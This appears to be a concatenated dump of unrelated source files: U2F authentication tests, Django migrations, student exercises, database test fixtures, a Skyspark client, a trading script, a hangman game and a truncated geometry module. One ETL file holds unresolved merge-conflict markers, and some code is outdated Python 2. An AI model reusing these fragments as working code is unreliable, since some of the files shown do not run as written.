csrf_token, 'registrationData': 'mock registration data', 'clientData': 'mock client data', 'version': 'U2F_V2', } response2 = client.post('/u2f/bind', data=json.dumps(data), content_type=self.content_type_json) bind_data = json.loads(response2.data) self.assertEqual('POST_U2F_U2F_BIND_SUCCESS', bind_data['type']) self.assertNotEqual([], bind_data['payload']['credentials']) def test_sign(self): eppn = self.test_user_data['eduPersonPrincipalName'] _ = self.add_token_to_user(eppn) response = self.browser.get('/u2f/sign') self.assertEqual(response.status_code, 302) # Redirect to token service with self.session_cookie(self.browser, eppn) as client: response2 = client.get('/u2f/sign') with client.session_transaction() as sess: self.assertIsNotNone(sess['_u2f_challenge_']) u2f_challenge = json.loads(sess['_u2f_challenge_']) self.assertEqual(u2f_challenge['appId'], 'https://eduid.se/u2f-app-id.json') self.assertEqual( u2f_challenge['registeredKeys'], [{u'keyHandle': u'keyHandle', u'version': u'version', u'appId': u'appId'}], ) self.assertIn('challenge', u2f_challenge) enroll_data = json.loads(response2.data) self.assertEqual(enroll_data['type'], 'GET_U2F_U2F_SIGN_SUCCESS') self.assertEqual(enroll_data['payload']['appId'], 'https://eduid.se/u2f-app-id.json') self.assertEqual( enroll_data['payload']['registeredKeys'], [{u'keyHandle': u'keyHandle', u'version': u'version', u'appId': u'appId'}], ) self.assertIn('challenge', enroll_data['payload']) @patch('u2flib_server.model.U2fSignRequest.complete') def test_verify(self, mock_u2f_sign_complete): eppn = self.test_user_data['eduPersonPrincipalName'] _ = self.add_token_to_user(eppn) device = RegisteredKey({u'keyHandle': u'keyHandle', u'version': u'version', u'appId': u'appId'}) mock_u2f_sign_complete.return_value = device, 1, 0 # device, signature counter, user presence (touch) response = self.browser.post('/u2f/bind', data={}) self.assertEqual(response.status_code, 302) # Redirect to token service with self.session_cookie(self.browser, eppn) as client: sign_response = client.get('/u2f/sign') csrf_token = json.loads(sign_response.data)['payload']['csrf_token'] data = { 'csrf_token': csrf_token, 'signatureData': 'mock registration data', 'clientData': 'mock client data', 'keyHandle': 'keyHandle', } response2 = client.post('/u2f/verify', data=json.dumps(data), content_type=self.content_type_json) verify_data = json.loads(response2.data) self.assertEqual(verify_data['type'], 'POST_U2F_U2F_VERIFY_SUCCESS') self.assertIsNotNone(verify_data['payload']['keyHandle']) self.assertIsNotNone(verify_data['payload']['counter']) self.assertIsNotNone(verify_data['payload']['touch']) @patch('eduid_common.api.am.AmRelay.request_user_sync') def test_modify(self, mock_request_user_sync): mock_request_user_sync.side_effect = self.request_user_sync eppn = self.test_user_data['eduPersonPrincipalName'] user_token = self.add_token_to_user(eppn) response = self.browser.post('/u2f/modify', data={}) self.assertEqual(response.status_code, 302) # Redirect to token service with self.session_cookie(self.browser, eppn) as client: credentials_response = client.get('/credentials') csrf_token = json.loads(credentials_response.data)['payload']['csrf_token'] data = { 'csrf_token': csrf_token, 'credential_key': user_token.key, 'description': 'test description', } response2 = client.post('/u2f/modify', data=json.dumps(data), content_type=self.content_type_json) modify_data = json.loads(response2.data) self.assertEqual(modify_data['type'], 'POST_U2F_U2F_MODIFY_SUCCESS') self.assertIsNotNone(modify_data['payload']['credentials']) for credential in modify_data['payload']['credentials']: self.assertIsNotNone(credential) if credential['key'] == 'keyHandle': self.assertEqual(credential['description'], 'test description') @patch('eduid_common.api.am.AmRelay.request_user_sync') def test_remove(self, mock_request_user_sync): mock_request_user_sync.side_effect = self.request_user_sync eppn = self.test_user_data['eduPersonPrincipalName'] user_token = self.add_token_to_user(eppn) response = self.browser.post('/u2f/remove', data={}) self.assertEqual(response.status_code, 302) # Redirect to token service with self.session_cookie(self.browser, eppn) as client: credentials_response = client.get('/credentials') csrf_token = json.loads(credentials_response.data)['payload']['csrf_token'] data = { 'csrf_token': csrf_token, 'credential_key': user_token.key, } response2 = client.post('/u2f/remove', data=json.dumps(data), content_type=self.content_type_json) modify_data = json.loads(response2.data) self.assertEqual(modify_data['type'], 'POST_U2F_U2F_REMOVE_SUCCESS') self.assertIsNotNone(modify_data['payload']['credentials']) for credential in modify_data['payload']['credentials']: self.assertIsNotNone(credential) if credential['key'] == user_token.key: raise AssertionError('credential with keyhandle keyHandle should be missing')
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Mon Sep 7 15:58:26 2020 @author: fred """ greeting = "Guten Morgen" a = greeting[2:5:1].upper() print(a) racetrack = "RaceTrack" b = racetrack[1:4:1].capitalize() print(b) summer = "summer" c = summer.replace("umm", "inn").capitalize() print(c)
# Mariska de Vries # 223751 # Vragen om de prijs van het toegangs kaartje toegangsprijs = int(input("Wat is de prijs van het toegangskaartje: ")) # Vragen om de leeftijd leeftijd1 = int(input("Wat is uw leeftijd: ")) leeftijd2 = int(input("Wat is uw leeftijd: ")) leeftijd3 = int(input("Wat is uw leeftijd: ")) leeftijd4 = int(input("Wat is uw leeftijd: ")) # leeftijd 1 if (leeftijd1 < 4): toegangsprijs = 0 elif (leeftijd1 < 12): toegangsprijs = 10 elif (leeftijd1 < 65): toegangsprijs = 20 elif (leeftijd1 > 64): toegangsprijs = 10 # leeftijd 2 if (leeftijd2 < 4): toegangsprijs2 = 0 elif (leeftijd2 < 12): toegangsprijs2 = 10 elif (leeftijd2 < 65): toegangsprijs2 = 20 elif (leeftijd2 > 64): toegangsprijs2 = 10 # leeftjid 3 if (leeftijd3 < 4): toegangsprijs3 = 0 elif (leeftijd3 < 12): toegangsprijs3 = 10 elif (leeftijd3 < 65): toegangsprijs3 = 20 elif (leeftijd3 > 64): toegangsprijs3 = 10 # leeftijd 4 if (leeftijd4 < 4): toegangsprijs4 = 0 elif (leeftijd4 < 12): toegangsprijs4 = 10 elif (leeftijd4 < 65): toegangsprijs4 = 20 elif (leeftijd4 > 64): toegangsprijs4 = 10 print("Intotaal te betalen: " + str(toegangsprijs + toegangsprijs2 + toegangsprijs3 + toegangsprijs4))
# Generated by Django 2.2 on 2019-05-22 22:14 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Category', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=200)), ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'verbose_name': 'Category', 'verbose_name_plural': 'Categories', }, ), migrations.CreateModel( name='Sections', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=200)), ('category', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='section_c', to='api.Category')), ], options={ 'verbose_name': 'Section', 'verbose_name_plural': 'Sections', }, ), migrations.CreateModel( name='Product', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=200)), ('price', models.FloatField()), ('description', models.CharField(max_length=200)), ('status', models.CharField(max_length=50)), ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='products_created', to=settings.AUTH_USER_MODEL)), ('purchased_by', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='products_purchased', to=settings.AUTH_USER_MODEL)), ('sections', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='product', to='api.Sections')), ], ), migrations.CreateModel( name='Basket', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('count', models.IntegerField()), ('product', models.ManyToManyField(to='api.Product')), ], ), ]
def age_assignment(*args, **kwargs): dic = {} for name in args: dic[name] = "" for n, age in kwargs.items(): if n == name[0]: dic[name] = age return dic print(age_assignment("Amy", "Bill", "Willy", W=36, A=22, B=61))
from mnist import * from spect import * import numpy as np # Perceptron Settings GLOBAL_EPOCH = 1 RATE = 1 # Kernel Settings DEGREE = 1 def linear(x, z): return x.dot(z) def poly_kernel(x, z, d=DEGREE): return x.dot(z)**d KERNEL = poly_kernel # Helper Functions === def sign(x): if x < 0: return -1 else: return 1 vsign = np.vectorize(sign) class Obj(): def __init__(self, x, y): self.target = y self.data = x def load_data(n, dataset='training'): # if n == 1: # x, y = load_mnist(dataset=dataset, path="data/") if n == "SPECT": x, y = load_spect(dataset=dataset) elif n == "WINEQUALITY": x = np.loadtxt('datasets/winequality-red.csv', delimiter=";") y = x[:,-1] x = x[:,:-1] elif n == "WINE": x = np.loadtxt('datasets/winequality-red.csv', delimiter=";") y = x[:,-1] x = x[:,:-1] else: x = np.array([[1,0,0],[1,0,1],[1,1,0],[1,1,1]]) y = np.array([[1], [1], [1], [-1]]) print x print y return Obj(x, y) # x_train = np.array([[1,0,0],[1,0,1],[1,1,0],[1,1,1]]) # y_train = np.array([1,1,1,-1]) # x_test = x_train # y_test = y_train def countErrors(g, y): t = np.equal(g, y) return sum([1 for i in t if not i]) class MultiClassifier(): def __init__(self, clf, epoch): self.classifiers = [] self.classes = [] self.clf = clf self.epoch = epoch def fit(self, X, Y): classifiers = [] classes = np.unique(Y) for val in classes: # print "Building labels", val new_labels = [] for i in xrange(len(Y)): if Y[i] == val: new_labels.append(1) else: new_labels.append(-1) clf = self.clf() # print "Training", val clf.fit(X, np.array(new_labels), self.epoch) classifiers.append(clf) self.classes = classes self.classifiers = classifiers def predict(self, X): guesses = [] for clf in self.classifiers: guesses.append(clf.value_predict(X)) predictions = [] for i in xrange(len(X)): m_val = None for j in xrange(len(self.classes)): #classes if m_val == None or guesses[j][i] > m_val: m_val = guesses[j][i] m_class_index = j predictions.append(self.classes[m_class_index]) return np.array(predictions)
# from .off_policy_algorithm import OffPolicyAlgorithm from .softq_controller import SoftQMPC # from .sac_mpc import SACMPC __all__ = ["SoftQMPC"] #, "SACMPC"]
"""OmniSciDB test configuration module.""" import os import typing import pandas import pytest import ibis import ibis.util as util OMNISCIDB_HOST = os.environ.get('IBIS_TEST_OMNISCIDB_HOST', 'localhost') OMNISCIDB_PORT = int(os.environ.get('IBIS_TEST_OMNISCIDB_PORT', 6274)) OMNISCIDB_USER = os.environ.get('IBIS_TEST_OMNISCIDB_USER', 'admin') OMNISCIDB_PASS = os.environ.get( 'IBIS_TEST_OMNISCIDB_PASSWORD', 'HyperInteractive' ) OMNISCIDB_PROTOCOL = os.environ.get('IBIS_TEST_OMNISCIDB_PROTOCOL', 'binary') OMNISCIDB_DB = os.environ.get('IBIS_TEST_DATA_DB', 'ibis_testing') @pytest.fixture(scope='module') def con(): """Define a connection fixture. Returns ------- ibis.omniscidb.OmniSciDBClient """ return ibis.omniscidb.connect( protocol=OMNISCIDB_PROTOCOL, host=OMNISCIDB_HOST, port=OMNISCIDB_PORT, user=OMNISCIDB_USER, password=OMNISCIDB_PASS, database=OMNISCIDB_DB, ) @pytest.fixture(scope='function') def test_table(con): """ Define fixture for test table. Yields ------- ibis.expr.types.TableExpr """ table_name = _random_identifier('table') con.drop_table(table_name, force=True) schema = ibis.schema( [('a', 'polygon'), ('b', 'point'), ('c', 'int8'), ('d', 'double')] ) con.create_table(table_name, schema=schema) yield con.table(table_name) con.drop_table(table_name) @pytest.fixture(scope='module') def session_con(): """Define a session connection fixture.""" # TODO: fix return issue return ibis.omniscidb.connect( protocol=OMNISCIDB_PROTOCOL, host=OMNISCIDB_HOST, port=OMNISCIDB_PORT, user=OMNISCIDB_USER, password=OMNISCIDB_PASS, database=OMNISCIDB_DB, ) return session_con @pytest.fixture(scope='module') def alltypes(con) -> ibis.expr.types.TableExpr: """Define a functional_alltypes table fixture. Parameters ---------- con : ibis.omniscidb.OmniSciDBClient Returns ------- ibis.expr.types.TableExpr """ return con.table('functional_alltypes') @pytest.fixture(scope='module') def awards_players(con) -> ibis.expr.types.TableExpr: """Define a awards_players table fixture. Parameters ---------- con : ibis.omniscidb.OmniSciDBClient Returns ------- ibis.expr.types.TableExpr """ return con.table('awards_players') @pytest.fixture(scope='module') def batting(con) -> ibis.expr.types.TableExpr: """Define a awards_players table fixture. Parameters ---------- con : ibis.omniscidb.OmniSciDBClient Returns ------- ibis.expr.types.TableExpr """ return con.table('batting') @pytest.fixture(scope='module') def df_alltypes(alltypes: ibis.expr.types.TableExpr) -> pandas.DataFrame: """Return all the data for functional_alltypes table. Parameters ---------- alltypes : ibis.expr.types.TableExpr [description] Returns ------- pandas.DataFrame """ return alltypes.execute() @pytest.fixture def translate() -> typing.Callable: """Create a translator function. Returns ------- function """ from ..compiler import OmniSciDBDialect dialect = OmniSciDBDialect() context = dialect.make_context() return lambda expr: dialect.translator(expr, context).get_result() def _random_identifier(suffix): return '__ibis_test_{}_{}'.format(suffix, util.guid()) @pytest.fixture def temp_table(con) -> str: """Return a temporary table name. Parameters ---------- con : ibis.omniscidb.OmniSciDBClient Yields ------ name : string Random table name for a temporary usage. """ name = _random_identifier('table') try: yield name finally: assert con.exists_table(name), name con.drop_table(name) @pytest.fixture(scope='session') def test_data_db() -> str: """Return the database name.""" return OMNISCIDB_DB @pytest.fixture def temp_database(con, test_data_db: str) -> str: """Create a temporary database. Parameters ---------- con : ibis.omniscidb.OmniSciDBClient test_data_db : str Yields ------- str """ name = _random_identifier('database') con.create_database(name) try: yield name finally: con.set_database(test_data_db) con.drop_database(name, force=True)
from sys import argv, exit from PyQt5.QtWidgets import QApplication, QMainWindow from ui.hat_recognization import Ui_MainWindow if __name__ == '__main__': app = QApplication(argv) window = QMainWindow() ui = Ui_MainWindow(window) window.show() exit(app.exec_())
# region import from odo import odo from sqlalchemy.sql.expression import bindparam from base import * from celery_create import celery from enrollment import ObservationPeriod, Enrollment # endregion def init_pedsnet(connection): pedsnet_schema = connection.pedsnet_schema # override the placeholder schemas on the tables ObservationPeriod.__table__.schema = pedsnet_schema pedsnet_engine = create_pedsnet_engine(connection) pedsnet_session = create_pedsnet_session(pedsnet_engine) return pedsnet_session def init_pcornet(connection): pcornet_schema = connection.pcornet_schema # override the placeholder schemas on the tables Enrollment.__table__.schema = pcornet_schema create_pcornet_engine(connection) <<<<<<< Updated upstream #@celery.task ======= @celery.task >>>>>>> Stashed changes def enrollment_etl(config): # set up connection = get_connection(config) pedsnet_session = init_pedsnet(connection) init_pcornet(connection) observation_period = pedsnet_session.query(ObservationPeriod.person_id, ObservationPeriod.observation_period_start_date, ObservationPeriod.observation_period_end_date, ObservationPeriod.site, bindparam("chart", 'Y'), bindparam("enr_basis", 'E') ).all() # endregion odo(observation_period, Enrollment.__table__, dshape='var * {patid: string, enr_start_date: date, enr_end_date: date, site: string, chart: String, ' 'enr_basis: String} ' ) # close session pedsnet_session.close()
import json from django.template.loader import render_to_string from django.utils.translation import ugettext_lazy as _ from wagtail.admin.widgets import AdminChooser from wagtail.documents.models import get_document_model class AdminDocumentChooser(AdminChooser): choose_one_text = _('Choose a document') choose_another_text = _('Choose another document') link_to_chosen_text = _('Edit this document') def __init__(self, **kwargs): super().__init__(**kwargs) self.document_model = get_document_model() def render_html(self, name, value, attrs): instance, value = self.get_instance_and_id(self.document_model, value) original_field_html = super().render_html(name, value, attrs) return render_to_string("wagtaildocs/widgets/document_chooser.html", { 'widget': self, 'original_field_html': original_field_html, 'attrs': attrs, 'value': value, 'document': instance, }) def render_js_init(self, id_, name, value): return "createDocumentChooser({0});".format(json.dumps(id_)) class Media: js = [ 'wagtaildocs/js/document-chooser-modal.js', 'wagtaildocs/js/document-chooser.js', ]
set encoding iso_8859_1 load 'Colours.py' set autoscale unset label set linestyle 1 lt 2 lw 1 set key box linestyle 1 lc 7 set key width 0.5 height 0.75 set key top right set xtic auto set ytic auto set title "Diametrically Opposed Zn Distances at 270K" font "Times-Roman,14" set ylabel "Distances (\305)" set xlabel "Time (ps)" set xrange [0:10] plot "DISTANCES_270K" using 1:2 title '1rst pair' with lines, \ "DISTANCES_270K" using 1:3 title '2nd pair' with lines, \ "DISTANCES_270K" using 1:4 title '3rd pair' with lines, \ "DISTANCES_270K" using 1:5 title '4th pair' with lines, \ "DISTANCES_270K" using 1:6 title '5th pair' with lines #plot 'file' u 1:2 with lines lt rgb "#d95319"
num_of_books_in_total = int(input()) books_arr = [0]+list(map(int,input().split())) no_of_borrowed_books = int(input()) for _ in range(no_of_borrowed_books): id = int(input()) print(books_arr.pop(id))
#!/usr/bin/env python """ chtml.py: Replacing img urls for html file. __author__ = "chaung.li" """ from re import compile from shutil import copyfile from json import load def backup(filename): file_name = filename + '.bak' copyfile(filename, file_name) print(f'{file_name} Backup done!') def dic(): with open('images.json', 'r') as load_f: j_dict = load(load_f) return j_dict def get_html(): read_data = '' with open('index.html', 'r+', encoding='utf-8') as f: read_data = f.read() return read_data def replace(): with open('index_ok.html', 'w', encoding='utf-8') as f: html = get_html() j_dic = dic() num = len(j_dic) for (k, v) in j_dic.items(): regex = compile('<img src=\"(.*{})'.format(k)) url = regex.search(html).group(1) html = html.replace(url, v) f.write(html) print(f'{num} images have been replaced done') if __name__ == '__main__': backup('index.html') replace()
#!python # -*- coding: utf-8 -*- """ Skyspark Client support """ import hszinc from six import string_types from .session import HaystackSession from .ops.vendor.skyspark import SkysparkAuthenticateOperation from .ops.vendor.skyspark_scram import SkysparkScramAuthenticateOperation from .mixins.vendor.skyspark import evalexpr class SkysparkHaystackSession(HaystackSession, evalexpr.EvalOpsMixin): """ The SkysparkHaystackSession class implements some base support for Skyspark servers. """ _AUTH_OPERATION = SkysparkAuthenticateOperation def __init__(self, uri, username, password, project="", **kwargs): """ Initialise a Skyspark Project Haystack session handler. :param uri: Base URI for the Haystack installation. :param username: Authentication user name. :param password: Authentication password. :param project: Skyspark project name """ super(SkysparkHaystackSession, self).__init__(uri, "api/%s" % project, **kwargs) self._project = project self._username = username self._password = password self._authenticated = False @property def is_logged_in(self): """ Return true if the user is logged in. """ return self._authenticated # Private methods/properties def _on_authenticate_done(self, operation, **kwargs): """ Process the result of an authentication operation. This needs to be implemented in the subclass and should, at minimum, set a flag in the subclass to indicate the authentication state and clear the _auth_op attribute on the base class. """ try: cookies = operation.result self._authenticated = True self._client.cookies = cookies except: self._authenticated = False self._client.cookies = None finally: self._auth_op = None class SkysparkScramHaystackSession(HaystackSession, evalexpr.EvalOpsMixin): """ The SkysparkHaystackSession class implements some base support for Skyspark servers. """ _AUTH_OPERATION = SkysparkScramAuthenticateOperation def __init__(self, uri, username, password, project, http_args=None, **kwargs): """ Initialise a Skyspark Project Haystack session handler. :param uri: Base URI for the Haystack installation. :param username: Authentication user name. :param password: Authentication password. :param project: Skyspark project name """ # Skyspark is allergic to requests.Session we must turn it off. http_args = http_args or {} http_args["requests_session"] = False super(SkysparkScramHaystackSession, self).__init__( uri, "api/%s" % project, http_args=http_args, **kwargs ) self._username = username self._password = password self._project = project self._authenticated = False self._authToken = None self._attestKey = None @property def is_logged_in(self): """ Return true if the user is logged in. """ return self._authenticated # Private methods/properties # For _get_grid, _post_grid, wrap the superclass version with a version # that defaults to exclude_cookies=True. This is because SkySpark gets # confused and demands an attestation key if we round-trip its cookies. def _get_grid( self, uri, callback, expect_format=None, cache=False, exclude_cookies=True, **kwargs ): return super(SkysparkScramHaystackSession, self)._get_grid( uri=uri, callback=callback, expect_format=expect_format, cache=cache, exclude_cookies=exclude_cookies, **kwargs ) def _post_grid( self, uri, grid, callback, expect_format=None, cache=False, exclude_cookies=True, **kwargs ): return super(SkysparkScramHaystackSession, self)._post_grid( uri=uri, grid=grid, callback=callback, expect_format=expect_format, cache=cache, exclude_cookies=exclude_cookies, **kwargs ) def _on_authenticate_done(self, operation, **kwargs): """ Process the result of an authentication operation. This needs to be implemented in the subclass and should, at minimum, set a flag in the subclass to indicate the authentication state and clear the _auth_op attribute on the base class. """ try: op_result = operation.result header = op_result["header"] self._authenticated = True self._client.cookies = None self._client.headers = header except: self._authenticated = False self._client.cookies = None finally: self._auth_op = None def logout(self): """close session when leaving context by trick given by Brian Frank https://www.skyfoundry.com/forum/topic/5282#c1 but beware that this is not standard!""" # TODO: Rewrite this when a standard way to close sessions is # implemented in Skyspark. def callback(response): try: status_code = response.status_code except AttributeError as error: status_code = -1 if status_code != 200: self._log.warning("Failed to close skyspark session") self._log.warning("status_code={}".format(status_code)) else: self._log.info("You've been properly disconnected") self._get("/user/logout", callback, api=False) def _on_his_read(self, point, rng, callback, **kwargs): """ Skyspark will not accept GET request for his_read by default [ref : https://project-haystack.org/forum/topic/787#c6] The default behavior of SkySpark is now to disallow GET requests non-idempotent operations. So its still allowed on certain operations such as about, formats, read. However as Chris said it can be toggled back on using Settings|API for backward compatibility. However as a recommendation I think we should always be using POST as a safer alternative. Using GET for ops with side-effects is against the HTTP spec. Plus it is an attack vector if cookies are involved. And it provides a more precise way to pass the request payload. Its not really from a theoretical perspective. But in SkySpark we allow customers to generate histories using their own custom functions. So from a security perspective we took the safest route and consider it to potentially have side effects. If your code is all using GET, then just have the customer set Settings|API allowGetWithSideEffects flag to false and it should all work. """ if isinstance(rng, slice): str_rng = ",".join([hszinc.dump_scalar(p) for p in (rng.start, rng.stop)]) elif not isinstance(rng, string_types): str_rng = hszinc.dump_scalar(rng) else: # No conversion here as this will be added to the grid as-is str_rng = rng his_grid = hszinc.Grid() his_grid.metadata["id"] = self._obj_to_ref(point) his_grid.column["id"] = {} his_grid.column["range"] = {} his_grid.append({"id": self._obj_to_ref(point), "range": str_rng}) return self._post_grid("hisRead", his_grid, callback, **kwargs)
#A strategy that buys stocks when market is not too bad and holds stock if its price doesn't exceed the threshold. import decision from collections import deque #Constants that determines buy decision MAX_DROP_PERCENTAGE_PER_DAY = 2 MAX_DROP_PERCENTAGE_PER_WEEK = 3 MAX_DROP_PERCENTAGE_PER_THREE_WEEK = 5 #Constants that determines sell decision MAX_GAIN_PRECENTAGE = 10 MAX_LOSS_PERCENTAGE = 5 price_history = deque() share_info = deque() shares = 0 cash = 0.0 def initialize(init_cash): global price_history, share_info, shares, cash price_history = deque() share_info = deque() shares = 0 cash = init_cash def on_stock_price_change(price): global price_history, share_info, shares, cash #Make sell decision. shares_to_sell = 0 if shares > 0: l = len(share_info) while l > 0: share_number, base_price, highest_price = share_info.popleft() highest_price = max(highest_price, price) if price / base_price * 100 >= 100 + MAX_GAIN_PRECENTAGE or price / highest_price * 100 <= 100 - MAX_LOSS_PERCENTAGE: new_sell = max(1, int(share_number / 2)) shares_to_sell = shares_to_sell + new_sell if share_number - new_sell > 0: share_info.append((share_number - new_sell, price, price)) else: share_info.append((share_number, base_price, highest_price)) l = l - 1 #Make buy decision. shares_to_buy = 0 price_history.append(price) if len(price_history) >= 15 * 7: #Remove outdated price history if len(price_history) > 15 * 7: price_history.popleft(); day_high = 0.0 day_drop = 0.0 week_high = 0.0 week_drop = 0.0 three_week_high = 0.0 three_week_drop = 0.0 should_buy = True i = 0 for old_price in price_history: if day_high > 0: day_drop = max(day_drop, (day_high - old_price) / day_high * 100) if week_high > 0: week_drop = max(week_drop, (week_high - old_price) / week_high * 100) if three_week_high > 0: three_week_drop = max(three_week_drop, (three_week_high - old_price) / three_week_high * 100) if day_drop >= MAX_DROP_PERCENTAGE_PER_DAY or week_drop >= MAX_DROP_PERCENTAGE_PER_WEEK or three_week_drop >= MAX_DROP_PERCENTAGE_PER_THREE_WEEK: should_buy = False break i = i + 1 if i%7 == 0: day_high = 0.0 day_drop = 0.0 if i%35 == 0: week_high = 0.0 week_drop = 0.0 day_high = max(day_high, old_price) week_high = max(week_high, old_price) three_week_high = max(three_week_high, old_price) if should_buy and cash >= price: shares_to_buy = max(1, int(cash/2/price)) share_info.append((shares_to_buy, price, price)) #We should wait for at least another week to make another purchase i = 7 * 5 while i > 0: price_history.popleft() i = i - 1 share_change = shares_to_buy - shares_to_sell cash = cash - share_change * price shares = shares + share_change assert_share_integrity() if share_change == 0: return [(decision.HOLD, 0, price)] elif share_change > 0: return [(decision.BUY, share_change, price)] else: return [(decision.SELL, - share_change, price)] def assert_share_integrity(): share_sum = 0 for e in share_info: share_sum = share_sum + e[0] if share_sum != shares: raise Exception("Share number mismatch!")
import subprocess, os word = '3' while not word.isalpha(): word = input("Enter your word of choice: ") if not word.isalpha(): print("Not a valid word bud. Go ahead and try again.\n") print("\n" * 50) cls = os.system("CLS") pinataCounter = 0 won = False lettersGuessed = [] def printPinata(n): print("--+ ") pinataArr = [' 0\n',' |\n',' /', '|', '\\\n', ' |\n', ' /',' \\\n'] if n != 3: pinataStr = '' for i in range(0,n): pinataStr += pinataArr[i] print(pinataStr) else: print(' 0\n |\n |') while not won and pinataCounter < 8: print('\n' * 3) printString = ' ' for char in word: printString += (char + ' ') if char in lettersGuessed else ' _ ' print(printString) guessLetter = 'haha' while len(guessLetter)!=1 or not guessLetter.isalpha() or guessLetter in lettersGuessed: guessLetter = input("Enter letter." + ("Already guessed this bub: " + ((str(lettersGuessed))[1:len(str(lettersGuessed))-1] + '\n') if len(lettersGuessed)>0 else '\n')) if len(guessLetter) !=1 or not guessLetter.isalpha(): print("Not a letter. Try it again.\n") if guessLetter in lettersGuessed: print("Already guessed it. Ty again") lettersGuessed.append(guessLetter) won = True for char in word: if not char in lettersGuessed: won = False if guessLetter in word: print("Yay. Correct letter!\n") else: print("Not a letter in ze word") pinataCounter += 1 if won or pinataCounter >=8: break print("Your pinata status: ") printPinata(pinataCounter) if won: print("Good job lad! You correctly got " +word +'.\n') else: print("You lose. You die") printPinata(pinataCounter)
# Generated by Django 3.1.3 on 2020-11-22 10:44 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('library', '0015_auto_20201122_1601'), ] operations = [ migrations.AlterField( model_name='profile', name='borrow_date', field=models.CharField(blank=True, default=0, max_length=50, null=True), ), migrations.AlterField( model_name='profile', name='return_date', field=models.CharField(blank=True, default=0, max_length=50, null=True), ), migrations.AlterField( model_name='records', name='return_date', field=models.CharField(default='None', max_length=50), ), ]
import subprocess from evdev import InputDevice, ecodes mpc_status = "mpc status".split() mpc_random = "mpc random on".split() mpc_clear = "mpc crop".split() mpc_FUNK = "mpc add FUNK/".split() mpc_JAZZ = "mpc add JAZZ/".split() mpc_ROCK = "mpc add ROCK/".split() mpc_ROCK_NOUV = "mpc add ROCK_NOUV/".split() mpc_Play = "mpc play".split() mpc_Pause = "mpc pause".split() mpc_next = "mpc next".split() mpc_prev = "mpc prev".split() mpc_volUp = "mpc volume +5".split() mpc_volDown = "mpc volume -5".split() device = InputDevice("/dev/input/event17") # à changer plus tard subprocess.call(mpc_random) for event in device.read_loop(): if event.type == ecodes.EV_KEY: # Lancement des playlists # FUNK KEY_NUMLOCK if event.code == 69: subprocess.call(mpc_clear) subprocess.call(mpc_FUNK) subprocess.call(mpc_Play) # JAZZ KEY_KPSLASH elif event.code == 98: subprocess.call(mpc_clear) subprocess.call(mpc_JAZZ) subprocess.call(mpc_Play) # ROCK KEY_KPASTERISK elif event.code == 55: subprocess.call(mpc_clear) subprocess.call(mpc_ROCK) subprocess.call(mpc_Play) # ROCK_NOUV KEY_KPMINUS elif event.code == 74: subprocess.call(mpc_clear) subprocess.call(mpc_ROCK_NOUV) subprocess.call(mpc_Play) # Raccourcis utiles # Play/Pause KEY.KP5 elif event.code == 76: status_output = subprocess.check_output(mpc_status) if "[playing]" in status_output.decode() and event.value != 1 and event.value != 2: subprocess.call(mpc_Pause) elif event.value != 1 and event.value != 2: subprocess.call(mpc_Play) # Next KEY_KP6 elif event.code == 77: subprocess.call(mpc_next) # Previous KEY_KP4 elif event.code == 75: subprocess.call(mpc_prev) # Volume UP KEY_KP8 elif event.code == 72: subprocess.call(mpc_volUp) # Volume DOWN KEY_KP2 elif event.code == 80: subprocess.call(mpc_volDown)
# coding: utf-8 from django.db import models from django.utils.translation import ugettext_lazy as _ class WeightedModel(models.Model): """ Objet ayant un poids, les poids les plus faibles sont en surface """ # Constantes WEIGHTS = ((x, x) for x in range(0, 100)) # Champs weight = models.SmallIntegerField(db_index=True, null=False, choices=WEIGHTS, default=10, help_text=_("Items with lower weights come first"), verbose_name=_("Weight")) # Métadonnées class Meta: abstract = True class PriorityModel(models.Model): """ Objet ayant une priorité, les priorités élevées passent en premier """ # Constantes WEIGHTS = ((x, x) for x in range(0, 100)) # Champs weight = models.SmallIntegerField(db_index=True, null=False, choices=WEIGHTS, default=10, help_text=_("Items with lower weights have lower priority"), verbose_name=_("Weight")) # Setter def increase_priority(self, save=True, amount=1): """ Augmenter la priorité de l'objet """ self.weight += amount if save is True: self.save(update_fields=['weight']) def decrease_priority(self, save=True, amount=1): """ Réduire la priorité de l'objet """ self.increase_priority(save=save, amount=-amount) # Métadonnées class Meta: abstract = True
#!/usr/bin/python # -*- coding: utf-8 -*- from __future__ import division from __future__ import unicode_literals #from __future__ import print_function #from __future__ import absolute_import __author__ = 'Marco Antonio Pinto-Orellan' from pypro import * if __name__ == "__main__": CommonProject().main()
from collections import defaultdict import logging from matplotlib import pyplot as plt import numpy as np import time from networkx import DiGraph, Graph import networkx as nx from typing import List, Tuple, Optional import drawing from hull import quickhull from independentset import planar_independent_set from polygons import Point, Polygon, Triangle from polygons import generate_random_tiling, generate_triangle_tiling from triangulate import triangulate def wrap_triangle(poly: Polygon) -> Tuple[Triangle, List[Triangle]]: """ Finds a large triangle that surrounds the polygon, and tiles the gap between the triangle the polygon. :param poly: polygon to be surrounded :return: tuple of the bounding triangle and the triangles in the gap """ """Wraps the polygon in a triangle and triangulates the gap""" bounding_triangle = Triangle.enclosing_triangle(poly) # We need to expand the triangle a little bit so that the polygon side isn't on top of # one of the triangle sides (otherwise Triangle library segfaults). bounding_triangle = bounding_triangle.scale(1.1) # bounding_region = bounding_triangle.triangulate(hole=poly) bounding_region = triangulate(bounding_triangle, hole=poly) return bounding_triangle, bounding_region def triangle_graph(regions: List[Polygon], graph: Graph) -> 